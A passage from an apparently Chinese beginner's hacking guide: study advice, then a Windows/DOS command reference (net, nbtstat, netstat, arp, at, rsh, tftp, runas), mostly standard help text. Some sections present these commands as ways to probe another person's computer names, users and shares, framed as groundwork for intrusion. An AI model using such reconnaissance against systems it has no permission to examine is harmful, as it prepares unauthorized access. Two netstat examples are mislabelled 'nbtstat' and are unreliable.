3963
3964
3965
3966
3967
3968
3969
3970
3971
3972
3973
3974
3975
3976
3977
3978
3979
3980
3981
3982
3983
3984
3985
3986
3987
3988
3989
3990
3991
3992
3993
3994
3995
3996
3997
3998
3999
4000
4001
4002
4003
4004
4005
4006
4007
4008
4009
4010
4011
4012
4013
4014
4015
4016
4017
4018
4019
4020
4021
4022
4023
4024
4025
4026
4027
4028
4029
4030
4031
4032
4033
4034
4035
4036
4037
4038
4039
4040
4041
4042
4043
4044
4045
4046
4047
4048
4049
4050
4051
4052
4053
4054
4055
4056
4057
4058
4059
4060
4061
4062
4063
4064
4065
4066
4067
4068
4069
4070
4071
4072
4073
4074
4075
4076
4077
4078
4079
4080
4081
4082
4083
4084
4085
4086
4087
4088
4089
4090
4091
4092
4093
4094
4095
4096
4097
4098
4099
4100
4101
4102
4103
4104
4105
4106
4107
4108
4109
4110
4111
4112
4113
4114
4115
4116
4117
4118
4119
4120
4121
4122
4123
4124
4125
4126
4127
4128
4129
4130
4131
4132
4133
4134
4135
4136
4137
4138
4139
4140
4141
4142
4143
4144
4145
4146
4147
4148
4149
4150
4151
4152
4153
4154
4155
4156
4157
4158
4159
4160
4161
4162
4163
4164
4165
4166
4167
4168
4169
4170
4171
4172
4173
4174
4175
4176
4177
4178
4179
4180
4181
4182
4183
4184
4185
4186
4187
4188
4189
4190
4191
4192
4193
4194
4195
4196
4197
4198
4199
4200
4201
4202
4203
4204
4205
4206
    我的电脑里有数千个资料文件,都是网上找的.所以我再再建议...:经常逛逛下载站,找找相关资料,并且下载,还有经常去技术blog,把有用的复制保存下来,多少浏览一遍,感兴趣的就认真看(还要用本子记下有用的资料),不感兴趣的就扫一遍.
这个方法其实比你买学技术还要快.
附:什么是有用的资料(例如:windows2000的日志存放处,VPN开启的必须条件,windows_HOME版本的XP不支持"用户与组"功能和没有IIS......)
最后在加一条,一定要学好E文啊!
第3章
有许多方法:
1、开始——运行——输入:cmd——确定
2、开始——程序——附件——cmd命令提示符
还有一些是新建一个批处理进入的,比如在桌面上新建个以.bat为后缀的文件,
右击以记事本打开——输入:cmd,保存退出,双击运行。
还有许多变通……
注意一下,像本目录下的“入侵命令详解”内的内容是基于IPC$漏洞的,现在这种古老的漏洞可能已经绝迹了,反正我到
现在没遇到过。所以那篇文章重在了解cmd的一些命令的格式。如果初期看不懂,还会有一些重复的cmd讲解,大家可以看那个。
并且不目录目的在于大家了解,不需要都掌握。
并且初期并不要求大家全掌握,在cmd下如果不知命令格式and 用法,可以在cmd下输入"命令 /?",假如你要查询ping的用法,输入ping /?。
要常用google和百度。不会的东西都可以搜索查
google和百度是最好的老师。
pass:不要在网络上随便拜师。许多都是骗人的……^_^
Enjoy it !
第4章
DOS 常用命令:
dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录
copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘
edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名
more 分屏显示 type 显示文件内容 rd 删除目录 sys 制作DOS系统盘
ren 改变文件名 xcopy 拷贝目录与文件 chkdsk 检查磁盘 attrib 设置文件属性
fdisk 硬盘分区 date 显示及修改日期 label 设置卷标号 defrag 磁盘碎片整理
msd 系统检测 path 设置搜寻目录 share 文件共享 memmaker内存优化管理
help 帮助 restore 恢复备份文件 set 设置环境变量 time 显示及修改时间
tree 列目录树 debug 随机调试程序 doskey 重新调用DOS命令 prempt 设置提示符 undelete恢复被删的文件 scandisk检测、修理磁盘
不常用DOS命令
diskcomp磁盘比较  append 设置非执行文件路径
expand 还原DOS文件 fasthelp快速显示帮助信息
fc 文件比较 interink启动服务器
setver 设置版本 intersvr启动客户机
subst 路径替换 qbasic Basic集成环境
vsafe 防病毒 unformat恢复已格式化的磁盘
ver 显示DOS版本号 smartdrv设置磁盘加速器
vol 显示磁盘卷标号 lh 将程序装入高端内存
ctty 改变控制设备 emm386 扩展内存管理
常用命令具体介绍:
一、Dir
显示目录文件和子目录列表,呵呵,这个当然是人人要知道的。
可以使用通配符(? 和 *),?表通配一个字符,*表通配任意字符
*.后缀
指定要查看后缀的文件。上面其实也可以为“ .后缀”,例如dir *.exe 等于dir .exe
/p
每次显示一个列表屏幕。要查看下一屏,请按键盘上的任意键。
/w
以宽格式显示列表,在每一行上最多显示 5 个文件名或目录名。
/s
列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了
dir *.* -> a.txt 把当前目录文件列表写入a.txt
dir *.* /s -> a.txt 把当前目录文件列表写入a.txt,包括子目录下文件。
二、Attrib
显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用,则 attrib 会显示当前目录中所有文件的属性。
+r
设置只读属性。
-r
清除只读属性。
+a
设置存档文件属性。
-a
清除存档文件属性。
+s
设置系统属性。
-s
清除系统属性。
+h
设置隐藏属性。
-h
清除隐藏属性。
三、Cls
清除显示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏”
四、Exit
退出当前命令解释程序并返回到系统。
五、format
格式化
/q
执行快速格式化。删除以前已格式化卷的文件表和根目录,但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。
六、Ipconfig
显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。
/all
显示所有适配器的完整 TCP/IP 配置信息。
ipconfig 等价于 winipcfg,后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面,但可以使用“网络连接”查看和更新 IP 地址。要做到这一点,请打开 网络连接,右键单击某一网络连接,单击“状态”,然后单击“支持”选项卡。
该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。
七、md
创建目录或子目录
八、Move
将一个或多个文件从一个目录移动到指定的目录。
九、Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
十、Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
十一、Ping
通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数,ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。
-t
指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息,请按 CTRL-BREAK。要中断并退出 ping,请按 CTRL-C。
-lSize
指定发送的回响请求消息中“数据”字段的长度(以字节表示)。默认值为 32。size 的最大值是 65,527。
十二、Rename (Ren)
更改文件的名称。
例如 ren *.abc *.cba
十三、Set
显示、设置或删除环境变量。如果没有任何参数,set 命令将显示当前环境设置。
十四、Shutdown
允许您关闭或重新启动本地或远程计算机。如果没有使用参数,shutdown 将注销当前用户。
-m ComputerName
指定要关闭的计算机。
-t xx
将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。
-l
注销当前用户,这是默认设置。-m ComputerName 优先。
-s
关闭本地计算机。
-r
关闭之后重新启动。
-a
中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。
十五、System File Checker (sfc)
win下才有,在重新启动计算机后扫描和验证所有受保护的系统文件。
/scannow
立即扫描所有受保护的系统文件。
/scanonce
一次扫描所有受保护的系统文件。
/purgecache
立即清除“Windows 文件保护”文件高速缓存,并扫描所有受保护的系统文件。
/cachesize=x
设置“Windows 文件保护”文件高速缓存的大小,以 MB 为单位。
十六、type
显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件
十七、Tree
图像化显示路径或驱动器中磁盘的目录结构。
十八、Xcopy
复制文件和目录,包括子目录。
/s
复制非空的目录和子目录。如果省略 /s,xcopy 将在一个目录中工作。
/e
复制所有子目录,包括空目录。
十九、copy
将一个或多个文件从一个位置复制到其他位置
二十、del
删除指定文件。
ftp和bat批命令和net和telnet由于子命令太多,这里不说了,不过这几个都是常用到的。
网络常用命令:
网络常用命令:
1.最基本,最常用的,测试物理网络的
ping 192.168.10.88 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 则将DNS改为了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.网络信使
Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段
net stop messenger 停止信使服务,也可以在面板-服务修改
net start messenger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名
ping -a IP -t ,只显示NetBios名
nbtstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
arp -a
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP:
ARP -s 192.168.10.59 00-50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启
9.几个net命令
A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
比如:查看这个IP上的共享资源,就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如:net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net session
例如:
C:\>net session
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface ip>show address
Arp
显示和修改"地址解析协议 (ARP)"缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。
语法
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
参数
-a [InetAddr] [-N IfaceAddr]
显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
-g [InetAddr] [-N IfaceAddr]
与 -a 相同。
-d InetAddr [IfaceAddr]
删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。
-s InetAddr EtherAddr [IfaceAddr]
向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。
/?
在命令提示符显示帮助。
注释
InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。
物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。
通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过"计划任务程序"在启动时运行该批处理文件。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示所有接口的 ARP 缓存表,可键入:
arp -a
对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入:
arp -a -N 10.0.0.99
要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入:arp -s 10.0.0.80 00-AA-00-4F-2A-9C
13.At
计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在"计划"服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。
语法
at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}]
at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,...]|/next:date[,...]}] command]
参数
\\computername
指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。
ID
指定指派给已计划命令的识别码。
/delete
取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。
/yes
删除已计划的事件时,对来自系统的所有询问都回答"是"。
hours:minutes
指定命令运行的时间。该时间用 24 小时制(即从 00:00 [午夜] 到 23:59)的 小时: 分钟格式表示。
/interactive
对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。
/every:
在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。
date
指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或一个月中的某日或多日(即,键入从 1 到31 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at 使用该月的当前日。
/next:
在下一个指定日期(比如,下一个星期四)到来时运行 command。
command
指定要运行的 Windows 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。
/?
在命令提示符显示帮助。
注释
Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅"相关主题"。
使用 at
使用 at 命令时,要求您必须是本地 Administrators 组的成员。
加载 Cmd.exe
在运行命令之前,At 不会自动加载 Cmd.exe (命令解释器)。如果没有运行可执行文件 (.exe),则在命令开头必须使用如下所示的方法专门加载 Cmd.exe:
cmd /c dir > c:\test.out。
查看已计划的命令
当不带命令行选项使用 at 时,计划任务会出现在类似于以下格式的表中:
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
OK 2 Each M 12:00 AM chkstor > check.file
OK 3 Each F 11:59 PM backup2.bat
包含标识号 (ID)
当在命令提示下使用带有标识号 (ID) 的 at 命令时,单个任务项的信息会显示在类似于下面的格式中:
Task ID:1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due当计划带有 at 的命令(尤其是带有命令行选项的命令)后,要通过键入不带命令行选项的 at 来检查该命令语法是否输入正确。如果显示在"命令行"列中的信息不正确,请删除该命令,然后重新键入它。如果还不正确,则可以在重新键入该命令时让它少带些命令行选项。查看结果
使用 at 的已经计划的命令作为后台程序运行。运行结果不会显示在计算机上。要将输出重定向到文件,请使用重定向符号 (>)。如果将输出重定向到文件,则不论是在命令行还是在批处理文件中使用 at,都需要在重定向符号之前使用转义符 (^)。例如,要重定向输出到 Output.text 文件,则要键入:
at 14:45 c:\test.bat ^>c:\output.txt
执行命令的当前目录为 systemroot 文件夹。
更改系统时间
在使用 at 命令计划了要运行的命令之后,如果更改了计算机的系统时间,则通过键入不带命令行选项的 at 可使 at 计划程序与修改后的系统时间同步。
存储命令
已计划的命令存储在注册表中。这样,如果重新启动"计划"服务,则不会丢失计划任务。
连接到网络驱动器
对于需要访问网络的计划作业,请不要使用已重新定向的驱动器。"计划"服务可能无法访问这些重定向的驱动器,或者,在该计划任务运行时如果有其他用户登录,则这些重定向的驱动器可能不会出现。因此,对于计划作业,请使用 UNC 路径。例如:
at 1:00pm my_backup \\server\share
请不要使用下述语法(其中 x: ?表示由用户建立的连接):
at 1:00pm my_backup x:
如果计划了一个使用驱动器号的 at 命令来连接共享目录,则应包含一个 at 命令以使在完成该驱动器的使用时断开与驱动器的连接。如果不能断开与驱动器的连接,则在命令提示下,所指派的驱动器号将不可用。
范例
要显示 Marketing 服务器上已计划的命令列表,请键入:
at \\marketing
要了解服务器 Corp 上标识号为 3 的命令的详细信息,请键入:
at \\corp 3
要计划在上午 8:00 于 Corp 服务器上运行网络共享命令,并将该列表重定向到 Maintenance 服务器的 Corp.txt 文件(位于 Reports 共享目录下)中,请键入:
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports >> \\maintenance\reports\corp.txt"
为了在每五天后的午夜将 Marketing 服务器的硬盘驱动器备份到磁带驱动器,首先创建名为 Archive.cmd 的批处理程序(它含有备份命令),然后计划该批处理程序的运行,为此请键入:
at \\marketing 00:00 /every:5,10,15,20,25,30 archive
要取消当前服务器上已计划的所有命令,请按下述方法清除 at 计划信息:
at /delete
如果要运行的命令不是可执行 (.exe) 文件,请按如下所示的方法在该命令之前使用 cmd /c 来加载 Cmd.exe:
cmd /c dir > c:\test.out。
14.Rsh
在运行 RSH 服务的远程计算机上运行命令。Windows XP 和 Windows 2000 不提供 RSH 服务。Windows 2000 Server Resource Kit 提供名为 Rshsvc.exe 的 RSH 服务。使用不带参数的 rsh 显示帮助。
语法
rsh [Host] [-l UserName] [-n] [Command]
参数
Host
指定运行 command 的远程计算机。
-l UserName
指定远程计算机上使用的用户名。在省略情况下,使用当前登录用户的名称。
-n
将 rsh 的输入重定向到 NULL 设备。这防止本地计算机命令结果的显示。
Command
指定要运行的命令。
/?
在命令提示符显示帮助。
注释
标准操作
rsh 命令将标准输入复制到远程 command,将远程 command 的标准输出复制到其标准输出,将远程 command 的标准错误复制到其标准错误。Rsh 通常在远程命令终止时终止。
使用重定向符号
为了使重定向在远程计算机上发生,要以引号引住重定向符号(例如 ">>")。如果不使用引号,重定向会在本地计算机发生。例如,以下命令将远程文件"RemoteFile"附加到本地文件"LocalFile"中:
rsh othercomputer cat remotefile >> localfile
以下命令将远程文件 Remotefile 附加到远程文件 otherremotefile 中:
rsh othercomputer cat remotefile ">>" otherremotefile
使用 rsh
在使用已登录到某个域并且运行 Windows XP Professional 的计算机时,该域的主域控制器必须可用于确认用户名或 rsh 命令失败。
.rhosts 文件
.rhosts 文件通常许可 UNIX 系统的网络访问权限。.rhosts 文件列出可以访问远程计算机的计算机名及关联的登录名。在正确配置了 .rhosts 文件的远程计算机上运行 rcp、rexec 或 rsh 命令时,您不必提供远程计算机的登录和密码信息。
.rhosts 文件是一个文本文件,该文件中每一行为一个条目。条目由本地计算机名、本地用户名和有关该条目的所有注释组成。每个条目均由制表符或空格分开,注释用符号 (#) 打头。例如:
host7 #This computer is in room 31A
.rhosts 文件必须在远程计算机的用户主目录中。有关远程计算机 .rhosts 文件特定执行的详细信息,请参阅远程系统的文档。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要以名称 admin1 在远程计算机 vax1 上执行 telcon 命令,请键入:
rsh vax1 -l admin1 telcon
15.Tftp
向运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件或从运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件。
语法
tftp [-i] [Host] [{get | put}] [Source] [Destination]
参数
-i
指定二进制图像传送模式(也称为八进制模式)。在二进制图像模式下,文件以一个字节为单位进行传输。在传送二进制文件时使用该模式。如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。该模式将行尾 (EOL) 字符转换为指定计算机的适当格式。传送文本文件时使用该模式。如果文件传送成功,将显示数据传输率。
Host
指定本地或远程计算机。
put
将本地计算机上的 Destination 文件传送到远程计算机上的 Source 文件。因为 TFTP 协议不支持用户身份验证,所以用户必须登录到远程计算机,同时文件在远程计算机上必须可写。
get
将远程计算机上的 Destination 文件传送到本地计算机上的 Source 文件。
Source
指定要传送的文件。
Destination
指定将文件传送到的位置。如果省略了 Destination,将假定它与 Source 同名。
/?
在命令提示符显示帮助。
注释
使用 get 参数
如果将本地计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 put。如果将远程计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 get。
Windows XP 或 Windows 2000 不提供一般用途的 TFTP 服务器。Windows 2000 提供的 TFTP 服务器服务只为 Windows XP 和 Windows 2000 客户端计算机提供远程引导功能。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要从本地计算机将文件 Users.txt 传送到远程计算机 vax1 上的 Users19.txt,请键入:
tftp vax1 put users.txt users19.txt
16.Nbtstat
显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。
语法
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]
参数
-a remotename
显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。NetBIOS 名称表是运行在该计算机上的应用程序使用的 NetBIOS 名称列表。
-A IPAddress
显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。
-c
显示 NetBIOS 名称缓存内容、NetBIOS 名称表及其解析的各个地址。
-n
显示本地计算机的 NetBIOS 名称表。Registered 中的状态表明该名称是通过广播或 WINS 服务器注册的。
-r
显示 NetBIOS 名称解析统计资料。在配置为使用 WINS 的 Windows XP 计算机上,该参数将返回已通过广播和 WINS 解析和注册的名称号码。
-R
清除 NetBIOS 名称缓存的内容并从 Lmhosts 文件中重新加载带有 #PRE 标记的项目。
-RR
重新释放并刷新通过 WINS 注册的本地计算机的 NetBIOS 名称。
-s
显示 NetBIOS 客户和服务器会话,并试图将目标 IP 地址转化为名称。
-S
显示 NetBIOS 客户和服务器会话,只通过 IP 地址列出远程计算机。
Interval
重新显示选择的统计资料,可以中断每个显示之间的 Interval 中指定的秒数。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只显示一次当前的配置信息。
/?
在命令提示符显示帮助。
注释
Nbtstat 命令行参数区分大小写。
下表列出了由 Nbtstat 生成的列标题。标题 说明
Input 接收的字节数。
Output 发送的字节数。
In/Out 该连接是否从计算机(传出)或者其他计算机到本地计算机(传入)。
Lift 名称表缓存项在被清除之前所存留的时间。
Local Name 本地 NetBIOS 名称与连接相关联。
Remote Host 与远程计算机相关的名称或 IP 地址。
<03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。
Type 名称类型。名称可以是单个名称,也可以是组名称。
Status 远程计算机上是否在运行 NetBIOS 服务("已注册"),或同一计算机名是否已注册了相同的服务("冲突")。
State NetBIOS 连接的状态。
下表列出了可能的 NetBIOS 连接状态。状态 说明
已连接 会话已建立。
关联 连接的终结点已经被创建并与 IP 地址关联。
正接听 该终结点对内向连接可用。
空闲 该结束点已被打开单不能接收连接。
正在连接 会话处于连接阶段。在此阶段正在解析所选目标的由名称到 IP 地址的映射。
接受 入站会话当前正在被接受,将在短期内连接。
重新连接 会话将试图重新连接(如果第一次连接失败)。
出站 会话正处于连接阶段。此阶段正在创建 TCP 连接。
入站 入站会话在连接期。
正在断开 会话正在断开连接。
已中断连接 本地计算机已断开连接,并正等待远程系统的确认。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 NetBIOS 计算机名为 CORP07 的远程计算机的 NetBIOS 名称表,请键入:
nbtstat -a CORP07
要显示所分配 IP 地址为 10.0.0.99 的远程计算机的 NetBIOS 名称表,请键入:
nbtstat -A 10.0.0.99
要显示本地计算机的 NetBIOS 名称表,请键入:
nbtstat -n
要显示本地计算机 NetBIOS 名称缓存的内容,请键入:
nbtstat -c
要清除 NetBIOS 名称缓存并重新装载本地 Lmhosts 文件中带标记 #PRE 的项目,请键入:
nbtstat -R
要释放通过 WINS 服务器注册的 NetBIOS 名称并对其重新注册,请键入:
nbtstat -RR
要每隔 5 秒以 IP 地址显示 NetBIOS 会话统计资料,请键入:
nbtstat -S 5
17.Netstat
显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。
语法
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
参数
-a
显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。
-e
显示以太网统计信息,如发送和接收的字节数、数据包数。该参数可以与 -s 结合使用。
-n
显示活动的 TCP 连接,不过,只以数字形式表现地址和端口号,却不尝试确定名称。
-o
显示活动的 TCP 连接并包括每个连接的进程 ID (PID)。可以在 Windows 任务管理器中的"进程"选项卡上找到基于 PID 的应用程序。该参数可以与 -a、-n 和 -p 结合使用。
-p Protocol
显示 Protocol 所指定的协议的连接。在这种情况下,Protocol 可以是 tcp、udp、tcpv6 或 udpv6。如果该参数与 -s 一起使用按协议显示统计信息,则 Protocol 可以是 tcp、udp、icmp、ip、tcpv6、udpv6、icmpv6 或 ipv6。
-s
按协议显示统计信息。默认情况下,显示 TCP、UDP、ICMP 和 IP 协议的统计信息。如果安装了 Windows XP 的 IPv6 协议,就会显示有关 IPv6 上的 TCP、IPv6 上的 UDP、ICMPv6 和 IPv6 协议的统计信息。可以使用 -p 参数指定协议集。
-r
显示 IP 路由表的内容。该参数与 route print 命令等价。
Interval
每隔 Interval 秒重新显示一次选定的信息。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只打印一次选定的信息。
/?
在命令提示符显示帮助。
注释
与该命令一起使用的参数必须以连字符 (-) 而不是以短斜线 (/) 作为前缀。
Netstat 提供下列统计信息:
Proto
协议的名称(TCP 或 UDP)。
Local Address
本地计算机的 IP 地址和正在使用的端口号。如果不指定 -n 参数,就显示与 IP 地址和端口的名称对应的本地计算机名称。如果端口尚未建立,端口以星号(*)显示。
Foreign Address
连接该插槽的远程计算机的 IP 地址和端口号码。如果不指定 -n 参数,就显示与 IP 地址和端口对应的名称。如果端口尚未建立,端口以星号(*)显示。
(state)
表明 TCP 连接的状态。可能的状态如下:
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
有关 TCP 连接状态的信息,请参阅 RFC 793。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要想显示以太网统计信息和所有协议的统计信息,请键入下列命令:
netstat -e -s
要想仅显示 TCP 和 UDP 协议的统计信息,请键入下列命令:
netstat -s -p tcp udp
要想每 5 秒钟显示一次活动的 TCP 连接和进程 ID,请键入下列命令:
nbtstat -o 5
要想以数字形式显示活动的 TCP 连接和进程 ID,请键入下列命令:
nbtstat -n -o
18.Runas
允许用户用其他权限运行指定的工具和程序,而不是用户当前登录提供的权限。
语法
runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program
参数
/profile
加载用户的配置文件。/profile 是默认值。
/no profile
/noprofile 指定不加载用户的配置文件。这使应用程序载入的更加快速,但是在一些应用程序中也会引起错误。
/env
指定当前使用的网络环境,而不是用户的本地环境。
/netonly
指明指定的用户信息只用于远程访问。
/smartcard
/smartcard 表示凭据是否是由智能卡提供的。
/showtrustlevels
列出 /trustlevel 开关项。
/trustlevel
指定应用程序运行所在的授权级别。使用 /showtrustlevels 查看可用的信任级别。
/user:UserAccountName
